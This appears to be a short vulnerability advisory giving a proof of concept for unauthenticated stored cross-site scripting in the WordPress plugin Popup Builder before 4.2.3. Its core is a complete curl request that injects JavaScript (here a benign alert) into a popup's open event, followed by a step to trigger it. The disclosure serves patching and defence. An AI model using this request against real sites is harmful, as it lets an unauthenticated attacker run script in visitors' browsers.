Popup Builder < 4.2.3 - Unauthenticated Stored XSS

Proof of Concept

1) Create a popup using the plugin
2) Run the following curl command, switching `$POPUPID` with that popup's ID:

```
curl --url 'http://vulnerable-site.tld/' --data 'sgpb-is-preview=1&blah[name]=sgpb-is-preview&blah[value]=0&post_ID=$POPUPID&sgpb-target%5B0%5D%5B0%5D%5Bparam%5D=everywhere&sgpb-type=html&sgpb-is-active=checked&sgpb-events%5B0%5D%5B0%5D%5Bparam%5D=load&sgpb-events%5B0%5D%5B0%5D%5Bvalue%5D=&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bparam%5D=contact-form-7&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Boperator%5D=redirect-url&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bvalue%5D=https%3A%2F%2Fexample.com&sgpb-popup-z-index=9999&sgpb-popup-themes=sgpb-theme-1&sgpb-overlay-color=&sgpb-overlay-opacity=0.8&sgpb-content-custom-class=sg-popup-content&sgpb-esc-key=on&sgpb-enable-close-button=on&sgpb-close-button-delay=0&sgpb-close-button-position=bottomRight&sgpb-button-position-top=&sgpb-button-position-right=9&sgpb-button-position-bottom=9&sgpb-button-position-left=&sgpb-button-image=&sgpb-button-image-width=21&sgpb-button-image-height=21&sgpb-border-color=%23000000&sgpb-border-radius=0&sgpb-border-radius-type=%25&sgpb-button-text=Close&sgpb-overlay-click=on&sgpb-popup-dimension-mode=responsiveMode&sgpb-responsive-dimension-measure=auto&sgpb-width=640px&sgpb-height=480px&sgpb-max-width=&sgpb-max-height=&sgpb-min-width=120px&sgpb-min-height=&sgpb-copy-to-clipboard-message=Copied+to+Clipboard%21&sgpb-open-animation-effect=No+effect&sgpb-close-animation-effect=No+effect&sgpb-enable-content-scrolling=on&sgpb-popup-order=0&sgpb-popup-delay=0&sgpb-ShouldOpen=alert%28document.domain%29%3B&sgpb-WillOpen=&sgpb-DidOpen=&sgpb-ShouldClose=&sgpb-WillClose=&sgpb-DidClose=&sgpb-css-editor='
```

3) Visit the site